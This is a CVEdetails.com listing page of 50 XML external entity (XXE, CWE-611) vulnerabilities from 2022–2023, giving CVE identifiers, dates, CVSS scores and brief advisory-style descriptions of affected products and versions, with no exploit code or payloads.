CVEdetails.com the ultimate security vulnerability data source
(e.g.: CVE-2009-1234 or 2010-1234 or 20101234)
Log In   Register
  Take a third party risk management course for FREE
Vulnerability Feeds & WidgetsNew   www.itsecdb.com  

Security Vulnerabilities Related To CWE-611

Press ESC to close
# CVE ID CWE ID # of Exploits Vulnerability Type(s) Publish Date Update Date Score Gained Access Level Access Complexity Authentication Conf. Integ. Avail.
1 CVE-2023-23595 611 2023-01-15 2023-01-24
0.0
None ??? ??? ??? ??? ??? ???
BlueCat Device Registration Portal 2.2 allows XXE attacks that exfiltrate single-line files. A single-line file might contain credentials, such as "machine example.com login daniel password qwerty" in the documentation example for the .netrc file format. NOTE: 2.x versions are no longer supported. There is no available information about whether any later version is affected.
2 CVE-2023-22624 611 2023-01-17 2023-01-23
0.0
None ??? ??? ??? ??? ??? ???
Zoho ManageEngine Exchange Reporter Plus before 5708 allows attackers to conduct XXE attacks.
3 CVE-2022-47514 611 2022-12-18 2022-12-22
0.0
None ??? ??? ??? ??? ??? ???
An XML external entity (XXE) injection vulnerability in XML-RPC.NET before 2.5.0 allows remote authenticated users to conduct server-side request forgery (SSRF) attacks, as demonstrated by a pingback.aspx POST request.
4 CVE-2022-46827 611 2022-12-08 2022-12-12
0.0
None ??? ??? ??? ??? ??? ???
In JetBrains IntelliJ IDEA before 2022.3 an XXE attack leading to SSRF via requests to custom plugin repositories was possible.
5 CVE-2022-46682 611 2022-12-12 2022-12-12
0.0
None ??? ??? ??? ??? ??? ???
Jenkins Plot Plugin 2.1.11 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
6 CVE-2022-45400 611 2022-11-15 2022-11-20
0.0
None ??? ??? ??? ??? ??? ???
Jenkins JAPEX Plugin 1.7 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
7 CVE-2022-45397 611 2022-11-15 2022-11-20
0.0
None ??? ??? ??? ??? ??? ???
Jenkins OSF Builder Suite : : XML Linter Plugin 1.0.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
8 CVE-2022-45396 611 2022-11-15 2022-11-20
0.0
None ??? ??? ??? ??? ??? ???
Jenkins SourceMonitor Plugin 0.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
9 CVE-2022-45395 611 2022-11-15 2022-11-20
0.0
None ??? ??? ??? ??? ??? ???
Jenkins CCCC Plugin 0.6 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
10 CVE-2022-45386 611 2022-11-15 2022-11-18
0.0
None ??? ??? ??? ??? ??? ???
Jenkins Violations Plugin 0.7.11 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
11 CVE-2022-45326 611 2022-12-06 2022-12-08
0.0
None ??? ??? ??? ??? ??? ???
An XML external entity (XXE) injection vulnerability in Kwoksys Kwok Information Server before v2.9.5.SP31 allows remote authenticated users to conduct server-side request forgery (SSRF) attacks.
12 CVE-2022-45194 611 2022-11-12 2022-11-16
0.0
None ??? ??? ??? ??? ??? ???
CBRN-Analysis before 22 allows XXE attacks via am mws XML document, leading to NTLMv2-SSP hash disclosure.
13 CVE-2022-43689 611 2022-11-14 2022-11-17
0.0
None ??? ??? ??? ??? ??? ???
Concrete CMS (formerly concrete5) below 8.5.10 and between 9.0.0 and 9.1.2 is vulnerable to XXE based DNS requests leading to IP disclosure.
14 CVE-2022-43570 611 2022-11-04 2022-11-08
0.0
None ??? ??? ??? ??? ??? ???
In Splunk Enterprise versions below 8.1.12, 8.2.9, and 9.0.2, an authenticated user can perform an extensible markup language (XML) external entity (XXE) injection via a custom View. The XXE injection causes Splunk Web to embed incorrect documents into an error.
15 CVE-2022-43430 611 2022-10-19 2022-10-22
0.0
None ??? ??? ??? ??? ??? ???
Jenkins Compuware Topaz for Total Test Plugin 2.4.8 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
16 CVE-2022-43415 611 2022-10-19 2022-10-21
0.0
None ??? ??? ??? ??? ??? ???
Jenkins REPO Plugin 1.15.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
17 CVE-2022-42341 611 2022-10-14 2022-10-18
0.0
None ??? ??? ??? ??? ??? ???
Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary file system read. Exploitation of this issue does not require user interaction.
18 CVE-2022-42307 611 2022-10-03 2022-10-04
0.0
None ??? ??? ??? ??? ??? ???
An issue was discovered in Veritas NetBackup through 10.0.0.1 and related Veritas products. The NetBackup Primary server is vulnerable to an XML External Entity (XXE) Injection attack through the DiscoveryService service.
19 CVE-2022-42301 611 2022-10-03 2022-10-04
0.0
None ??? ??? ??? ??? ??? ???
An issue was discovered in Veritas NetBackup through 10.0.0.1 and related Veritas products. The NetBackup Primary server is vulnerable to an XML External Entity (XXE) injection attack through the nbars process.
20 CVE-2022-41967 611 2022-12-28 2023-01-06
0.0
None ??? ??? ??? ??? ??? ???
Dragonfly is a Java runtime dependency management library. Dragonfly v0.3.0-SNAPSHOT does not configure DocumentBuilderFactory to prevent XML external entity (XXE) attacks. This issue is patched in 0.3.1-SNAPSHOT. As a workaround, since Dragonfly only parses XML `SNAPSHOT` versions are being resolved, this vulnerability may be avoided by not trying to resolve `SNAPSHOT` versions.
21 CVE-2022-41241 611 2022-09-21 2022-09-22
0.0
None ??? ??? ??? ??? ??? ???
Jenkins RQM Plugin 2.8 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
22 CVE-2022-41226 611 2022-09-21 2022-09-22
0.0
None ??? ??? ??? ??? ??? ???
Jenkins Compuware Common Configuration Plugin 1.0.14 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
23 CVE-2022-40771 611 2022-11-23 2022-11-29
0.0
None ??? ??? ??? ??? ??? ???
Zoho ManageEngine ServiceDesk Plus versions 13010 and prior are vulnerable to an XML External Entity attack that leads to Information Disclosure.
24 CVE-2022-40747 611 2022-11-03 2022-11-04
0.0
None ??? ??? ??? ??? ??? ???
"IBM InfoSphere Information Server 11.7 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 236584."
25 CVE-2022-40705 611 2022-09-22 2022-09-24
0.0
None ??? ??? ??? ??? ??? ???
** UNSUPPORTED WHEN ASSIGNED ** An Improper Restriction of XML External Entity Reference vulnerability in RPCRouterServlet of Apache SOAP allows an attacker to read arbitrary files over HTTP. This issue affects Apache SOAP version 2.2 and later versions. It is unknown whether previous versions are also affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
26 CVE-2022-40304 611 2022-11-23 2022-12-21
0.0
None ??? ??? ??? ??? ??? ???
An issue was discovered in libxml2 before 2.10.3. Certain invalid XML entity definitions can corrupt a hash table key, potentially leading to subsequent logic errors. In one case, a double-free can be provoked.
27 CVE-2022-39135 611 2022-09-11 2022-11-21
0.0
None ??? ??? ??? ??? ??? ???
In Apache Calcite prior to version 1.32.0 the SQL operators EXISTS_NODE, EXTRACT_XML, XML_TRANSFORM and EXTRACT_VALUE do not restrict XML External Entity references in their configuration, which makes them vulnerable to a potential XML External Entity (XXE) attack. Therefore any client exposing these operators, typically by using Oracle dialect (the first three) or MySQL dialect (the last one), is affected by this vulnerability (the extent of it will depend on the user under which the application is running). From Apache Calcite 1.32.0 onwards, Document Type Declarations and XML External Entity resolution are disabled on the impacted operators.
28 CVE-2022-38419 611 2022-10-14 2022-10-28
0.0
None ??? ??? ??? ??? ??? ???
Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary file system read. Exploitation of this issue does not require user interaction.
29 CVE-2022-38342 611 2022-09-13 2022-10-27
0.0
None ??? ??? ??? ??? ??? ???
Safe Software FME Server v2021.2.5, v2022.0.0.2 and below was discovered to contain a XML External Entity (XXE) vulnerability which allows authenticated attackers to perform data exfiltration or Server-Side Request Forgery (SSRF) attacks.
30 CVE-2022-37911 611 DoS 2022-12-12 2022-12-13
0.0
None ??? ??? ??? ??? ??? ???
Due to improper restrictions on XML entities multiple vulnerabilities exist in the command line interface of ArubaOS. A successful exploit could allow an authenticated attacker to retrieve files from the local system or cause the application to consume system resources, resulting in a denial of service condition.
31 CVE-2022-37189 611 DoS 2022-09-07 2022-09-10
0.0
None ??? ??? ??? ??? ??? ???
DDMAL MEI2Volpiano 0.8.2 is vulnerable to XML External Entity (XXE), leading to a Denial of Service. This occurs due to the usage of the unsafe 'xml.etree' library to parse untrusted XML input.
32 CVE-2022-36773 611 2022-09-01 2022-11-03
0.0
None ??? ??? ??? ??? ??? ???
IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 233571.
33 CVE-2022-35741 611 DoS 2022-07-18 2022-07-25
0.0
None ??? ??? ??? ??? ??? ???
Apache CloudStack version 4.5.0 and later has a SAML 2.0 authentication Service Provider plugin which is found to be vulnerable to XML external entity (XXE) injection. This plugin is not enabled by default and the attacker would require that this plugin be enabled to exploit the vulnerability. When the SAML 2.0 plugin is enabled in affected versions of Apache CloudStack could potentially allow the exploitation of XXE vulnerabilities. The SAML 2.0 messages constructed during the authentication flow in Apache CloudStack are XML-based and the XML data is parsed by various standard libraries that are now understood to be vulnerable to XXE injection attacks such as arbitrary file reading, possible denial of service, server-side request forgery (SSRF) on the CloudStack management server.
34 CVE-2022-35168 611 2022-07-12 2022-07-20
5.0
None Remote Low Not required None None Partial
Due to improper input sanitization of XML input in SAP Business One - version 10.0, an attacker can perform a denial-of-service attack rendering the system temporarily inoperative.
35 CVE-2022-34793 611 2022-06-30 2022-07-08
6.5
None Remote Low ??? Partial Partial Partial
Jenkins Recipe Plugin 1.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
36 CVE-2022-34348 611 2022-09-23 2022-09-27
0.0
None ??? ??? ??? ??? ??? ???
IBM Sterling Partner Engagement Manager 6.1 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 230017.
37 CVE-2022-34001 611 2022-07-19 2022-07-27
0.0
None ??? ??? ??? ??? ??? ???
Unit4 ERP through 7.9 allows XXE via ExecuteServerProcessAsynchronously.
38 CVE-2022-32458 611 2022-07-20 2022-09-14
0.0
None ??? ??? ??? ??? ??? ???
Digiwin BPM has a XML External Entity Injection (XXE) vulnerability due to insufficient validation for user input. An unauthenticated remote attacker can perform XML injection attack to access arbitrary system files.
39 CVE-2022-32285 611 2022-06-14 2022-06-22
4.3
None Remote Medium Not required Partial None None
A vulnerability has been identified in Mendix SAML Module (Mendix 7 compatible) (All versions < V1.16.6), Mendix SAML Module (Mendix 8 compatible) (All versions < V2.2.2), Mendix SAML Module (Mendix 9 compatible) (All versions < V3.2.3). The affected module is vulnerable to XML External Entity (XXE) attacks due to insufficient input sanitation. This may allow an attacker to disclose confidential data under certain circumstances.
40 CVE-2022-31775 611 2022-08-01 2022-08-04
0.0
None ??? ??? ??? ??? ??? ???
IBM DataPower Gateway 10.0.2.0 through 10.0.4.0, 10.0.1.0 through 10.0.1.8, 10.5.0.0, and 2018.4.1.0 through 2018.4.1.21 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 228359.
41 CVE-2022-31678 611 2022-10-28 2022-10-31
0.0
None ??? ??? ??? ??? ??? ???
VMware Cloud Foundation (NSX-V) contains an XML External Entity (XXE) vulnerability. On VCF 3.x instances with NSX-V deployed, this may allow a user to exploit this issue leading to a denial-of-service condition or unintended information disclosure.
42 CVE-2022-31471 611 2022-07-26 2022-08-01
0.0
None ??? ??? ??? ??? ??? ???
untangle is a python library to convert XML data to python objects. untangle versions 1.2.0 and earlier improperly restricts XML external entity references. By exploiting this vulnerability, a remote unauthenticated attacker may read the contents of local files.
43 CVE-2022-31447 611 2022-06-14 2022-06-27
5.0
None Remote Low Not required Partial None None
An XML external entity (XXE) injection vulnerability in Magicpin v3.4 allows attackers to access sensitive database information via a crafted SVG file.
44 CVE-2022-31261 611 2022-05-24 2022-06-08
4.3
None Remote Medium Not required Partial None None
An XXE issue was discovered in Morpheus through 5.2.16 and 5.4.x through 5.4.4. A successful attack requires a SAML identity provider to be configured. In order to exploit the vulnerability, the attacker must know the unique SAML callback ID of the configured identity source. A remote attacker can send a request crafted with an XXE payload to invoke a malicious DTD hosted on a system that they control. This results in reading local files that the application has access to.
45 CVE-2022-30971 611 2022-05-17 2022-05-25
6.5
None Remote Low ??? Partial Partial Partial
Jenkins Storable Configs Plugin 1.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
46 CVE-2022-29943 611 2022-05-04 2022-05-13
6.8
None Remote Low ??? Complete None None
Talend Administration Center has a vulnerability that allows an authenticated user to use XML External Entity (XXE) processing to achieve read access as root on the remote filesystem. The issue is fixed for versions 8.0.x in TPS-5189, versions 7.3.x in TPS-5175, and versions 7.2.x in TPS-5201. Earlier versions of Talend Administration Center may also be impacted; users are encouraged to update to a supported version.
47 CVE-2022-29801 611 2022-05-20 2022-08-10
5.0
None Remote Low Not required Partial None None
A vulnerability has been identified in Teamcenter V12.4 (All versions < V12.4.0.13), Teamcenter V13.0 (All versions < V13.0.0.9). The application contains a XML External Entity Injection (XXE) vulnerability. This could allow an attacker to view files on the application server filesystem.
48 CVE-2022-29265 611 2022-04-30 2022-05-10
5.0
None Remote Low Not required Partial None None
Multiple components in Apache NiFi 0.0.1 to 1.16.0 do not restrict XML External Entity references in the default configuration. The Standard Content Viewer service attempts to resolve XML External Entity references when viewing formatted XML files. The following Processors attempt to resolve XML External Entity references when configured with default property values: - EvaluateXPath - EvaluateXQuery - ValidateXml Apache NiFi flow configurations that include these Processors are vulnerable to malicious XML documents that contain Document Type Declarations with XML External Entity references. The resolution disables Document Type Declarations in the default configuration for these Processors, and disallows XML External Entity resolution in standard services.
49 CVE-2022-28890 611 2022-05-05 2022-05-13
7.5
None Remote Low Not required Partial Partial Partial
A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities.
50 CVE-2022-28219 611 Exec Code 2022-04-05 2022-10-26
7.5
None Remote Low Not required Partial Partial Partial
Cewolf in Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an unauthenticated XXE attack that leads to Remote Code Execution.
Total number of vulnerabilities : 799   Page : 1 (This Page)2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
CVE is a registred trademark of the MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. CWE is a registred trademark of the MITRE Corporation and the authoritative source of CWE content is MITRE's CWE web site. OVAL is a registered trademark of The MITRE Corporation and the authoritative source of OVAL content is MITRE's OVAL web site.
Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.